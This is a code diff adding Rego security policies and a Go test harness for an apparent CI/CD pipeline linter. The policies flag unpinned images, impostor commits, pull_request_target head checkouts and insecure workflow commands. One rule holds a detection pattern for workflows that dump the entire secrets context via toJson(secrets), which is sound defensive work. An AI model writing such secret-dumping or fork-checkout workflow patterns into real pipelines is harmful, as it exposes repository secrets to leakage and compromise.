+# slash is never treated as official.
+_is_docker_hub_official(img) if {
+ _registry_is_docker_hub(img)
+ not contains(img.name, "/")
+}
+
+_registry_is_docker_hub(img) if img.registry == "docker.io"
+
+_registry_is_docker_hub(img) if not img.registry
+
+_registry_is_docker_hub(img) if img.registry == ""
+
+# _normalize_var rewrites `${VAR}` references to `$VAR` so user
+# patterns and rendered image refs compare equal regardless of which
+# notation a pipeline author used. Mirrors the normalizeVarNotation
+# helper in controlGitlabImageUntrusted.go.
+_normalize_var(s) := regex.replace(s, `\$\{([a-zA-Z_][a-zA-Z0-9_]*)\}`, `$$$1`)
+
+# _full_ref builds the canonical `/:` string the
+# trusted-URL globs in .plumber.yaml are written against. Including
+# the tag is essential β patterns like `docker.io/foo/bar:*`
+# explicitly carry a colon and the glob would otherwise miss the
+# untagged form. The "unknown" registry literal is collapsed to no
+# registry (legacy behaviour: imageUrl = image.Name only).
+_full_ref(img) := ref if {
+ _has_known_registry(img)
+ img.tag != ""
+ ref := sprintf("%s/%s:%s", [img.registry, img.name, img.tag])
+} else := ref if {
+ _has_known_registry(img)
+ ref := sprintf("%s/%s", [img.registry, img.name])
+} else := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
+
+_has_known_registry(img) if {
+ img.registry != ""
+ img.registry != "unknown"
+}
diff --git a/policies/image_mutable_tag.rego b/policies/image_mutable_tag.rego
new file mode 100644
index 0000000..cf1266e
--- /dev/null
+++ b/policies/image_mutable_tag.rego
@@ -0,0 +1,38 @@
+# image_mutable_tag β flag pipeline jobs whose container image uses a tag
+# listed in the user's .plumber.yaml forbidden-tag set.
+#
+# Config contract:
+# input.config.imageMutableTag.forbiddenTags = ["latest", "dev", "v*-alpha", ...]
+#
+# Patterns support glob wildcards (`*`, `?`) for parity with the legacy Go
+# control containerImageMustNotUseForbiddenTags. Issue code ISSUE-102 is
+# kept identical to the Go output so findings stay comparable in shadow mode.
+package image_mutable_tag
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ tag := job.image.tag
+ tag != ""
+ _tag_is_forbidden(tag)
+ finding := {
+ "code": "ISSUE-102",
+ "severity": "high",
+ "message": sprintf("Job '%s' uses forbidden tag '%s' (image: %s)", [job.name, tag, _full_ref(job.image)]),
+ "job": job.name,
+ "tag": tag,
+ "link": _full_ref(job.image),
+ }
+}
+
+_full_ref(img) := ref if {
+ img.registry != ""
+ ref := sprintf("%s/%s:%s", [img.registry, img.name, img.tag])
+} else := sprintf("%s:%s", [img.name, img.tag])
+
+_tag_is_forbidden(tag) if {
+ pattern := input.config.imageMutableTag.forbiddenTags[_]
+ glob.match(pattern, null, tag)
+}
diff --git a/policies/image_pinned_by_digest.rego b/policies/image_pinned_by_digest.rego
new file mode 100644
index 0000000..e5c0fc3
--- /dev/null
+++ b/policies/image_pinned_by_digest.rego
@@ -0,0 +1,55 @@
+# image-pinned-by-digest β flag pipeline jobs whose container image is
+# referenced by tag rather than by immutable content digest (`@sha256:β¦`).
+# Only fires when the policy is opted into via
+# `containerImageMustNotUseForbiddenTags.mustBePinnedByDigest: true` in
+# the .plumber.yaml, matching the legacy Go control semantics. Tag-based
+# references (even pinned to a specific version like `python:3.12.1`)
+# are flagged because the tag can be moved to a different image at any
+# point in time.
+package image_pinned_by_digest
+
+import rego.v1
+
+deny contains finding if {
+ _pin_by_digest_required
+ some i
+ job := input.pipeline.jobs[i]
+ job.image
+ not _image_has_digest(job.image)
+ finding := {
+ "code": "ISSUE-103",
+ "severity": "high",
+ "message": sprintf("job %q uses image without digest pinning: %s", [job.name, _image_ref(job.image)]),
+ "job": job.name,
+ "link": _image_ref(job.image),
+ "tag": _image_tag(job.image),
+ }
+}
+
+_image_tag(img) := img.tag if {
+ img.tag != ""
+} else := ""
+
+_pin_by_digest_required if {
+ input.config.containerImageMustNotUseForbiddenTags.mustBePinnedByDigest == true
+}
+
+_image_has_digest(img) if {
+ img.digest != null
+ img.digest != ""
+}
+
+# Build the full `/:` ref the legacy "link"
+# field surfaces. Falls back to bare name (and optionally :tag) when
+# the registry is empty.
+_image_ref(img) := ref if {
+ img.registry != ""
+ img.tag != ""
+ ref := sprintf("%s/%s:%s", [img.registry, img.name, img.tag])
+} else := ref if {
+ img.registry != ""
+ ref := sprintf("%s/%s", [img.registry, img.name])
+} else := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
diff --git a/policies/impostor_commit.rego b/policies/impostor_commit.rego
new file mode 100644
index 0000000..6631df0
--- /dev/null
+++ b/policies/impostor_commit.rego
@@ -0,0 +1,39 @@
+# impostor-commit β flag workflow steps pinned to a 40-character
+# SHA that does not resolve in the action's upstream repository.
+# Either a typo (the runner silently falls back to the default
+# branch) or the literal `impostor commit` attack vector: a commit
+# that looks legitimate in a PR comment / stargazer URL but was
+# never merged upstream.
+#
+# Requires the collector to have resolved the action's GitHub
+# metadata. When metadata is missing we stay silent β verifying a
+# SHA against the upstream repo needs an API call and we refuse to
+# guess.
+package impostor_commit
+
+import rego.v1
+
+sha_pattern := `^[0-9a-f]{40}$`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ ref := _ref_of(action.uses)
+ regex.match(sha_pattern, ref)
+ action.metadata
+ action.metadata.refExists == false
+ finding := {
+ "code": "ISSUE-109",
+ "severity": "critical",
+ "message": sprintf("job %q pins action %q to a commit SHA that does not exist in the upstream repository β typo or impostor-commit attack", [job.name, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_ref_of(uses) := ref if {
+ idx := indexof(uses, "@")
+ idx >= 0
+ ref := substring(uses, idx + 1, -1)
+}
diff --git a/policies/includes_forbidden_version.rego b/policies/includes_forbidden_version.rego
new file mode 100644
index 0000000..b0fcdde
--- /dev/null
+++ b/policies/includes_forbidden_version.rego
@@ -0,0 +1,40 @@
+# includes-forbidden-version β flag pipeline includes whose pinned
+# version appears in the .plumber.yaml's forbiddenVersions list (for
+# example branch names like "main" or "master", which are
+# rolling-release pointers rather than immutable refs).
+#
+# Parity with the legacy Go control:
+# - Hardcoded jobs are skipped (origins without a pinnable version).
+# - Patterns support wildcard semantics via glob.match (matches the
+# legacy go-wildcard.Match behaviour: `*` and `?`).
+# - When defaultBranchIsForbiddenVersion is true, the project's
+# default branch (carried on the IR pipeline) joins the
+# forbidden list.
+package includes_forbidden_version
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ inc := input.pipeline.includes[i]
+ inc.kind != "hardcoded"
+ inc.ref != ""
+ _version_is_forbidden(inc.ref)
+ finding := {
+ "code": "ISSUE-404",
+ "severity": "medium",
+ "message": sprintf("%s uses forbidden version '%s'", [inc.source, inc.ref]),
+ "job": inc.source,
+ }
+}
+
+_version_is_forbidden(ref) if {
+ pattern := input.config.includesForbiddenVersions.forbiddenVersions[_]
+ glob.match(pattern, null, ref)
+}
+
+_version_is_forbidden(ref) if {
+ input.config.includesForbiddenVersions.defaultBranchIsForbiddenVersion == true
+ input.pipeline.defaultBranch != ""
+ ref == input.pipeline.defaultBranch
+}
diff --git a/policies/includes_outdated.rego b/policies/includes_outdated.rego
new file mode 100644
index 0000000..2d22645
--- /dev/null
+++ b/policies/includes_outdated.rego
@@ -0,0 +1,52 @@
+# includes-outdated β flag pipeline includes that are pinned to a
+# version older than the latest one advertised upstream (Plumber
+# template registry or GitLab component catalogue). The collector
+# resolves the latest version ahead of time and exposes it on the
+# include as `current`; when `ref != current` (and both are
+# populated) the include is out of date.
+package includes_outdated
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ inc := input.pipeline.includes[i]
+ inc.ref != ""
+ inc.current != ""
+ inc.ref != inc.current
+ not _ref_is_forbidden_version(inc.ref)
+ _is_semver_like(inc.ref)
+ finding := {
+ "code": "ISSUE-403",
+ "severity": "medium",
+ "message": sprintf("%s uses version '%s' (latest: %s)", [inc.source, inc.ref, inc.current]),
+ "job": inc.source,
+ "version": inc.ref,
+ "latestVersion": inc.current,
+ "gitlabIncludeLocation": inc.source,
+ "gitlabIncludeType": inc.kind,
+ "nested": object.get(inc, "nested", false),
+ "componentName": object.get(inc, "componentName", ""),
+ "originHash": object.get(inc, "originHash", 0),
+ }
+}
+
+# A ref pinned to a configured forbidden version (e.g. `main`,
+# `master`, `HEAD`) is already flagged by ISSUE-404. Comparing it to
+# the latest semver release is a category error β the user is asking
+# for a mutable ref by design, so "outdated" is meaningless. Mirrors
+# the legacy IsUpToDate behaviour where mutable refs were treated as
+# up-to-date.
+_ref_is_forbidden_version(ref) if {
+ some forbidden in input.config.includesForbiddenVersions.forbiddenVersions
+ glob.match(forbidden, null, ref)
+}
+
+# Outdated comparison only makes sense for refs that look like a
+# version number. Mutable branch/tag pointers (`main`, `master`,
+# `HEAD`, `develop`, ...) have no meaningful "latest" β they ARE the
+# tip of a branch β so we skip them regardless of user config. A
+# semver-like ref optionally starts with `v`, then a numeric major
+# component, optional minor/patch parts, and an optional pre-release
+# or build suffix.
+_is_semver_like(ref) if regex.match(`^v?\d+(\.\d+)*([-+].*)?$`, ref)
diff --git a/policies/insecure_commands.rego b/policies/insecure_commands.rego
new file mode 100644
index 0000000..84115c2
--- /dev/null
+++ b/policies/insecure_commands.rego
@@ -0,0 +1,26 @@
+# insecure-commands β detect workflows that re-enable the deprecated
+# GitHub Actions workflow commands (`::set-env::`, `::add-path::`).
+# These commands were disabled by GitHub after CVE-2020-15228 because
+# they let attacker-controlled log output rewrite the running job's
+# environment and PATH from inside a step. Turning them back on via
+# `ACTIONS_ALLOW_UNSECURE_COMMANDS: true` re-introduces the exact
+# injection sink a mitigation was deployed to close.
+package insecure_commands
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _insecure_commands_enabled(job.variables)
+ finding := {
+ "code": "ISSUE-208",
+ "severity": "high",
+ "message": sprintf("job %q re-enables deprecated workflow commands via ACTIONS_ALLOW_UNSECURE_COMMANDS (CVE-2020-15228)", [job.name]),
+ "job": job.name,
+ }
+}
+
+_insecure_commands_enabled(vars) if {
+ vars["ACTIONS_ALLOW_UNSECURE_COMMANDS"] == "true"
+}
diff --git a/policies/job_variable_override.rego b/policies/job_variable_override.rego
new file mode 100644
index 0000000..5a99880
--- /dev/null
+++ b/policies/job_variable_override.rego
@@ -0,0 +1,54 @@
+# job-variable-override β flag jobs that define (and therefore
+# override) a variable that should only live in the platform settings
+# (GitLab CI/CD Settings > Variables, GitHub repository secrets, β¦).
+# The authoritative list ships in .plumber.yaml under
+# pipelineMustNotOverrideJobVariables.variables.
+#
+# The policy reads job.localVariables β the `variables:` block the
+# project author wrote directly in .gitlab-ci.yml β never the merged
+# Variables map. This way variables shipped by an upstream component
+# or template stay out of scope (only the user's deliberate override
+# matters), while a user-authored override on a job inherited from a
+# component (e.g. `secret_detection: { variables: { SAST_DISABLED:
+# true } }`) still fires. Mirrors the legacy raw-conf scan in
+# controlGitlabPipelineJobVariablesOverride.go.
+package job_variable_override
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ some var_name in _protected_variables
+ job.localVariables[var_name]
+ finding := {
+ "code": "ISSUE-205",
+ "severity": "critical",
+ "message": sprintf("%s = %q (job %q)", [var_name, job.localVariables[var_name], job.name]),
+ "job": job.name,
+ "variableName": var_name,
+ "value": job.localVariables[var_name],
+ "location": job.name,
+ }
+}
+
+# Pipeline-level globals override the platform-only contract just as
+# job-level definitions do. Emit once per protected variable defined
+# at the global block.
+deny contains finding if {
+ some var_name in _protected_variables
+ input.pipeline.globalVariables[var_name]
+ finding := {
+ "code": "ISSUE-205",
+ "severity": "critical",
+ "message": sprintf("%s = %q (global variables)", [var_name, input.pipeline.globalVariables[var_name]]),
+ "variableName": var_name,
+ "value": input.pipeline.globalVariables[var_name],
+ "location": "global",
+ }
+}
+
+_protected_variables := vars if {
+ vars := input.config.jobVariablesOverride.protectedVariables
+ count(vars) > 0
+} else := []
diff --git a/policies/known_vulnerable_action.rego b/policies/known_vulnerable_action.rego
new file mode 100644
index 0000000..0d65ac7
--- /dev/null
+++ b/policies/known_vulnerable_action.rego
@@ -0,0 +1,53 @@
+# known-vulnerable-action β flag action references that carry a
+# published GitHub Advisory Database entry. The collector queries
+# `/advisories?ecosystem=actions&affects=/` once per
+# repo and caches the result, so finding the N callers of a single
+# compromised action costs one API call.
+#
+# The policy emits one finding per (job, action) pair whose
+# Advisories slice is non-empty. The message quotes each GHSA
+# identifier alongside its advisory URL on the GitHub Advisory
+# Database β the terminal renderer turns the URL into a clickable
+# link. Severity is critical: a workflow running a known-
+# vulnerable action version inherits the published vulnerability
+# class with the full blast radius of the job's permissions and
+# secrets.
+#
+# Caveat: Plumber does not today evaluate the advisory's
+# `vulnerable_version_range` semver expression against the pinned
+# ref, so a positive hit means "at least one advisory exists for
+# this action". Policies that want to whitelist patched versions
+# can use `--skip-controls actionsMustNotCarryKnownCVEs` on a
+# per-job basis once the upgrade is live.
+package known_vulnerable_action
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.metadata
+ count(action.metadata.advisories) > 0
+ finding := {
+ "code": "ISSUE-114",
+ "severity": "critical",
+ "message": sprintf("job %q references %q β published advisories: %s", [job.name, action.uses, _format_advisories(action.metadata.advisories)]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+# _format_advisories renders each GHSA ID next to its canonical
+# advisory URL so reviewers can open the page with a single click
+# from the terminal. Example output for two IDs:
+#
+# GHSA-mrrh-fwg8-r2c3 (https://github.com/advisories/GHSA-mrrh-fwg8-r2c3),
+# GHSA-abcd-efgh-ijkl (https://github.com/advisories/GHSA-abcd-efgh-ijkl)
+_format_advisories(ids) := out if {
+ decorated := [link |
+ some id in ids
+ link := sprintf("%s (https://github.com/advisories/%s)", [id, id])
+ ]
+ out := concat(", ", decorated)
+}
diff --git a/policies/missing_concurrency.rego b/policies/missing_concurrency.rego
new file mode 100644
index 0000000..a520cce
--- /dev/null
+++ b/policies/missing_concurrency.rego
@@ -0,0 +1,49 @@
+# missing-concurrency β flag GitHub Actions workflows that declare no
+# `concurrency:` block at either the workflow level or on any of
+# their jobs. Concurrent triggers on the same ref (rebases,
+# force-pushes, CI retries) then race on caches, artefact uploads,
+# and external state, and β worse β can deploy stale output by
+# overtaking a newer run. Declaring concurrency (usually
+# grouped by `${{ github.workflow }}-${{ github.ref }}`) makes the
+# later run the one that lands.
+#
+# The policy aggregates by originFile: a workflow is fine as soon as
+# ONE of its jobs β or the workflow header β declares concurrency.
+package missing_concurrency
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ some file in _workflow_files_missing_concurrency
+ finding := {
+ "code": "ISSUE-602",
+ "severity": "medium",
+ "message": sprintf("workflow file %q declares no concurrency group β concurrent runs will race on caches, deploys and artefacts", [file]),
+ "file": file,
+ }
+}
+
+_workflow_files_missing_concurrency contains file if {
+ # Collect every workflow file seen, then subtract the ones that
+ # are covered either at workflow or job level.
+ some i
+ job := input.pipeline.jobs[i]
+ file := job.originFile
+ file != ""
+ not _workflow_covered(file)
+}
+
+_workflow_covered(file) if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.originFile == file
+ job.workflowHasConcurrency
+}
+
+_workflow_covered(file) if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.originFile == file
+ job.jobHasConcurrency
+}
diff --git a/policies/overprovisioned_secrets.rego b/policies/overprovisioned_secrets.rego
new file mode 100644
index 0000000..3e17cb9
--- /dev/null
+++ b/policies/overprovisioned_secrets.rego
@@ -0,0 +1,57 @@
+# overprovisioned-secrets β flag workflows that serialise the entire
+# GitHub Actions `secrets` context with `toJson(secrets)` /
+# `toJSON(secrets)` and pass it into a step. The JSON payload contains
+# every repository, organisation and environment secret the job has
+# access to; once the string lands in a run script, an env binding or
+# a `with:` input it can leak through logs, third-party actions, or
+# whatever downstream consumer the step invokes. Even a single
+# `echo "$SECRETS"` has been enough in past incidents β GitHub's log
+# redaction works on known secret values, not on a JSON blob derived
+# from them.
+#
+# The policy looks at three sinks:
+# - job scripts (jobs..steps[].run)
+# - job env bindings (jobs..env + steps[].env rolled up)
+# - action inputs (jobs..steps[].with[*])
+# A finding fires as soon as one of them references the full secrets
+# context. Scoped references like `${{ secrets.NPM_TOKEN }}` are
+# ignored β they name a specific secret and are the intended pattern.
+package overprovisioned_secrets
+
+import rego.v1
+
+# Matches `toJson(secrets)`, `toJSON(secrets)`, and their whitespace-
+# permissive variants. The wrapping `${{ }}` is not required for the
+# match β some workflows build the string with `fromJSON(toJson(...))`
+# chains and we want to catch those too.
+secrets_dump_pattern := `(?i)to\s*json\s*\(\s*secrets\s*\)`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_dumps_secrets(job)
+ finding := {
+ "code": "ISSUE-301",
+ "severity": "critical",
+ "message": sprintf("job %q exports the entire secrets context via toJson(secrets) β pass secrets by name instead", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_dumps_secrets(job) if {
+ some k
+ regex.match(secrets_dump_pattern, job.scripts[k])
+}
+
+_job_dumps_secrets(job) if {
+ some _, value in job.variables
+ regex.match(secrets_dump_pattern, value)
+}
+
+_job_dumps_secrets(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(secrets_dump_pattern, value)
+}
diff --git a/policies/placeholder.rego b/policies/placeholder.rego
new file mode 100644
index 0000000..fb93a63
--- /dev/null
+++ b/policies/placeholder.rego
@@ -0,0 +1,5 @@
+# Phase 1d placeholder: ensures //go:embed *.rego has at least one file to
+# include so the package compiles. This policy declares no rules, so the
+# engine queries against it return zero findings. Delete or replace once
+# a real policy ships.
+package placeholder
diff --git a/policies/pull_request_target_head_checkout.rego b/policies/pull_request_target_head_checkout.rego
new file mode 100644
index 0000000..8f24582
--- /dev/null
+++ b/policies/pull_request_target_head_checkout.rego
@@ -0,0 +1,51 @@
+# pull-request-target-head-checkout β flag the precise vector behind
+# the March 2025 tj-actions/changed-files compromise (CVE-2025-30066):
+# a workflow triggered by `pull_request_target` that calls
+# actions/checkout with a `ref:` pointing at the PR head
+# (github.event.pull_request.head.sha, github.head_ref, β¦).
+#
+# pull_request_target already fires the broader dangerous-triggers
+# check (ISSUE-414) β this rule pinpoints the exploitable
+# configuration where base-repo secrets AND fork-controlled code
+# coexist in the same run. The severity is critical and distinct so
+# an operator can prioritise it above the general trigger warning.
+package pull_request_target_head_checkout
+
+import rego.v1
+
+# Refs known to resolve to attacker-controlled content under a
+# pull_request_target trigger.
+fork_ref_patterns := [
+ `github\.event\.pull_request\.head\.sha`,
+ `github\.event\.pull_request\.head\.ref`,
+ `github\.head_ref`,
+ `github\.event\.number`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ _under_pull_request_target(job)
+ action := job.uses[j]
+ startswith(action.uses, "actions/checkout@")
+ ref := action.with.ref
+ is_string(ref)
+ _ref_points_at_pr_head(ref)
+ finding := {
+ "code": "ISSUE-415",
+ "severity": "critical",
+ "message": sprintf("job %q runs under pull_request_target AND checks out the PR head (ref=%q) β base-repo secrets and fork-controlled code in the same run (tj-actions / CVE-2025-30066 pattern)", [job.name, ref]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_under_pull_request_target(job) if {
+ some t in job.triggers
+ t == "pull_request_target"
+}
+
+_ref_points_at_pr_head(ref) if {
+ some p in fork_ref_patterns
+ regex.match(p, ref)
+}
diff --git a/policies/ref_confusion.rego b/policies/ref_confusion.rego
new file mode 100644
index 0000000..bb328f3
--- /dev/null
+++ b/policies/ref_confusion.rego
@@ -0,0 +1,29 @@
+# ref-confusion β flag action references whose symbolic name exists
+# upstream as BOTH a tag and a branch. GitHub Actions resolves tags
+# first, so the reference works today; but the ambiguity is a
+# supply-chain landmine: a maintainer who later ships a breaking
+# change on the branch, a workflow typo that drops the expected
+# ref prefix, or a tag deletion, each silently swaps which of the
+# two revisions executes.
+#
+# The collector does the cross-existence probe via the GitHub API.
+# When the probe returns RefIsAmbiguous=true, we emit the finding.
+# Degraded mode (no API auth) leaves the field zero-valued and the
+# rule stays silent to avoid false positives.
+package ref_confusion
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.metadata.refIsAmbiguous == true
+ finding := {
+ "code": "ISSUE-113",
+ "severity": "medium",
+ "message": sprintf("job %q references %q β the ref name resolves as both a tag AND a branch upstream, which revision runs is ambiguous", [job.name, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
diff --git a/policies/ref_version_mismatch.rego b/policies/ref_version_mismatch.rego
new file mode 100644
index 0000000..2864528
--- /dev/null
+++ b/policies/ref_version_mismatch.rego
@@ -0,0 +1,78 @@
+# ref-version-mismatch β flag `@ # vX.Y.Z` pins where the SHA
+# does not correspond to the tag named in the trailing comment. The
+# comment is the reviewer's trust signal; if the SHA says one version
+# and the comment says another, the review is misled.
+#
+# Uses the collector's API-resolved metadata: when the collector sees
+# a trailing comment with a version token, it queries the upstream
+# repository for the SHA that version resolves to (CommentTagSha).
+# The policy compares that SHA to the one actually pinned in `uses:`.
+#
+# Two ruled cases:
+# 1. Pinned ref is a SHA, comment names a version, the version
+# resolves to a different SHA. The classic mismatch.
+# 2. Pinned ref is a tag, the comment names a different version.
+# Caught by string comparison; the API data is not needed here
+# so the rule still fires in degraded (offline) mode.
+package ref_version_mismatch
+
+import rego.v1
+
+sha_pattern := `^[0-9a-f]{40}$`
+version_comment_pattern := `^\s*v?(\d+(?:\.\d+)*(?:-[A-Za-z0-9.-]+)?)\s*$`
+
+# Case 1 β SHA pin, comment-named tag resolved to a different SHA.
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.metadata
+ action.metadata.commentVersion != ""
+ action.metadata.commentTagSha != ""
+ ref := _ref_of(action.uses)
+ regex.match(sha_pattern, ref)
+ action.metadata.commentTagSha != ref
+ finding := {
+ "code": "ISSUE-110",
+ "severity": "medium",
+ "message": sprintf("job %q pins %q but comment %q names tag %q which resolves to %q β reviewers will misread the version", [job.name, action.uses, action.comment, action.metadata.commentVersion, action.metadata.commentTagSha]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+# Case 2 β tag pin, comment names a different tag. Offline-safe.
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.comment != ""
+ action.metadata.refKind == "tag"
+ ref := _ref_of(action.uses)
+ cv := _comment_version(action.comment)
+ cv != ""
+ _strip_v(ref) != _strip_v(cv)
+ finding := {
+ "code": "ISSUE-110",
+ "severity": "medium",
+ "message": sprintf("job %q pins tag %q with comment %q β ref and comment name different versions", [job.name, action.uses, action.comment]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_ref_of(uses) := ref if {
+ idx := indexof(uses, "@")
+ idx >= 0
+ ref := substring(uses, idx + 1, -1)
+}
+
+_comment_version(comment) := v if {
+ m := regex.find_all_string_submatch_n(version_comment_pattern, comment, 1)
+ count(m) > 0
+ v := m[0][0]
+}
+
+_strip_v(s) := trimmed if {
+ trimmed := trim_prefix(s, "v")
+}
diff --git a/policies/release_workflow_unsigned.rego b/policies/release_workflow_unsigned.rego
new file mode 100644
index 0000000..3963be5
--- /dev/null
+++ b/policies/release_workflow_unsigned.rego
@@ -0,0 +1,122 @@
+# release-workflow-unsigned β flag release / publish jobs that
+# produce artefacts without any signing step. Consumers of the
+# release then have no cryptographic handle to verify the artefact
+# was built by the expected pipeline rather than tampered with
+# along the way (cache poisoning, compromised runner, repository
+# takeover). Signing (Sigstore cosign, GPG, SLSA provenance, npm
+# --provenance) turns "I trust this came from that repo" into a
+# falsifiable statement.
+#
+# Fires only when the job is a release / publish context (trigger
+# `release`, or invokes a recognised publish action) AND none of its
+# steps invoke a recognised signing action. OIDC-based publish
+# actions (`pypa/gh-action-pypi-publish` with trusted publishing,
+# `npm publish --provenance`) are considered self-signing.
+package release_workflow_unsigned
+
+import rego.v1
+
+publish_actions := {
+ "pypa/gh-action-pypi-publish",
+ "JS-DevTools/npm-publish",
+ "softprops/action-gh-release",
+ "ncipollo/release-action",
+ "goreleaser/goreleaser-action",
+ "docker/build-push-action",
+}
+
+signing_actions := {
+ "sigstore/cosign-installer",
+ "sigstore/gh-action-sigstore-python",
+ "crazy-max/ghaction-import-gpg",
+ "slsa-framework/slsa-github-generator",
+ "philips-labs/slsa-provenance-action",
+ "sigstore/sigstore-java",
+ # GitHub-native Sigstore attestation actions (keyless OIDC
+ # signing into the Rekor transparency log). `attest-build-provenance`
+ # is the SLSA provenance flavour; `attest-sbom` signs SBOMs; the
+ # base `attest` action signs arbitrary predicates.
+ "actions/attest-build-provenance",
+ "actions/attest-sbom",
+ "actions/attest",
+}
+
+# Self-signing publish contexts: the publish action itself handles
+# provenance when the right inputs are passed, so absence of a
+# dedicated signing step is expected.
+self_signing_publish_actions := {
+ "pypa/gh-action-pypi-publish", # trusted publishing attaches provenance
+}
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _is_release_context(job)
+ not _job_self_signs(job)
+ not _job_runs_signing_step(job)
+ finding := {
+ "code": "ISSUE-112",
+ "severity": "medium",
+ "message": sprintf("job %q publishes release artefacts without any signing step β add cosign / sigstore / GPG alongside the publish action", [job.name]),
+ "job": job.name,
+ }
+}
+
+_is_release_context(job) if {
+ some t in job.triggers
+ t == "release"
+}
+
+_is_release_context(job) if {
+ some k
+ action := job.uses[k]
+ _is_publish_action(action.uses)
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_actions
+ uses == prefix
+}
+
+_job_runs_signing_step(job) if {
+ some k
+ action := job.uses[k]
+ some prefix in signing_actions
+ startswith(action.uses, sprintf("%s@", [prefix]))
+}
+
+_job_runs_signing_step(job) if {
+ some k
+ action := job.uses[k]
+ some prefix in signing_actions
+ action.uses == prefix
+}
+
+# npm --provenance on a run: script counts as self-signing.
+_job_runs_signing_step(job) if {
+ some k
+ regex.match(`npm\s+publish\s.*--provenance`, job.scripts[k])
+}
+
+# cosign / gpg --detach-sign invoked directly in a run: script.
+_job_runs_signing_step(job) if {
+ some k
+ regex.match(`\bcosign\s+sign\b`, job.scripts[k])
+}
+
+_job_runs_signing_step(job) if {
+ some k
+ regex.match(`\bgpg\s+--?detach-?sign\b`, job.scripts[k])
+}
+
+_job_self_signs(job) if {
+ some k
+ action := job.uses[k]
+ some prefix in self_signing_publish_actions
+ startswith(action.uses, sprintf("%s@", [prefix]))
+}
diff --git a/policies/rules_test.go b/policies/rules_test.go
new file mode 100644
index 0000000..9e6e9a5
--- /dev/null
+++ b/policies/rules_test.go
@@ -0,0 +1,2934 @@
+package policies_test
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "path/filepath"
+ "sort"
+ "strings"
+ "testing"
+
+ "gopkg.in/yaml.v2"
+
+ "github.com/getplumber/plumber/collector"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/policies"
+)
+
+// reservedTopLevelKeys are GitLab CI top-level keys that must not be
+// interpreted as jobs by the mini-parser below.
+var reservedTopLevelKeys = map[string]struct{}{
+ "stages": {},
+ "variables": {},
+ "default": {},
+ "include": {},
+ "workflow": {},
+ "image": {},
+ "services": {},
+ "before_script": {},
+ "after_script": {},
+ "cache": {},
+}
+
+// parseGitLabCI is a deliberately narrow parser that extracts only what the
+// currently ported rules need (jobs + jobs.*.image). It is the test-time
+// substitute for the full collector, which depends on the GitLab API.
+// Limitations: no include/extend resolution, no default image propagation,
+// no variable expansion. Extend as new rules require it.
+func parseGitLabCI(t *testing.T, data []byte) *ir.NormalizedPipeline {
+ t.Helper()
+
+ var raw map[string]any
+ if err := yaml.Unmarshal(data, &raw); err != nil {
+ t.Fatalf("parse yaml: %v", err)
+ }
+
+ var jobs []ir.Job
+ for key, value := range raw {
+ if _, reserved := reservedTopLevelKeys[key]; reserved {
+ continue
+ }
+ section, ok := toStringMap(value)
+ if !ok {
+ continue
+ }
+ job := ir.Job{Name: key}
+ if img, ok := parseImageField(section["image"]); ok {
+ job.Image = &img
+ }
+ if svc := parseServicesField(section["services"]); len(svc) > 0 {
+ job.Services = svc
+ }
+ if vars := parseVariablesField(section["variables"]); len(vars) > 0 {
+ job.Variables = vars
+ // Fixtures are user-authored .gitlab-ci.yml files: every
+ // `variables:` block on a job is the project's own. Mirror
+ // the production collector by exposing them as
+ // LocalVariables too so policies that distinguish "user
+ // wrote this" from merged-in upstream see them.
+ job.LocalVariables = vars
+ }
+ if af, ok := section["allow_failure"].(bool); ok {
+ job.AllowFailure = af
+ }
+ if w, ok := section["when"].(string); ok {
+ job.When = w
+ }
+ if scripts := parseScriptsField(section["script"]); len(scripts) > 0 {
+ job.Scripts = scripts
+ }
+ jobs = append(jobs, job)
+ }
+
+ sort.Slice(jobs, func(i, j int) bool { return jobs[i].Name < jobs[j].Name })
+ return &ir.NormalizedPipeline{Provider: ir.ProviderGitLab, Jobs: jobs}
+}
+
+// parseServicesField accepts the GitLab services polymorphic form:
+// list of strings or list of {name: β¦} maps.
+func parseServicesField(v any) []ir.Image {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]ir.Image, 0, len(list))
+ for _, item := range list {
+ switch s := item.(type) {
+ case string:
